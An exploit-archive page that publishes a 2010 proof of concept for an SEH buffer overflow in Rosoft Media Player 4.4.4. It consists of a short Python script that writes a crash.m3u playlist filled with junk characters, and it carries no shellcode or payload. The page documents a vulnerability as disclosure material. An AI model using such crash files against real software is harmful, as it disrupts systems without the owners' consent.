[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Rosoft media player 4.4.4 SEH buffer overflow POC
# Published : 2010-08-10
# Author : Abhishek Lyall
# Previous Title : Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054)
# Next Title : Mthree Development MP3 to WAV Decoder Denial of Service Vulnerability
#rosoft media player 4.4.4 SEH buffer overflow POC
#vulnerble application link http://download.cnet.com/Rosoft-Media-Player/3000-2139_4-10044022.html
#tested on XP SP2
#author abhishek lyall - abhilyall[at]gmail[dot]com
#web - http://www.aslitsecurity.com/
#blog - http://www.aslitsecurity.blogspot.com/
#!/usr/bin/python
filename = "crash.m3u"
junk = "x41" * 4500
textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()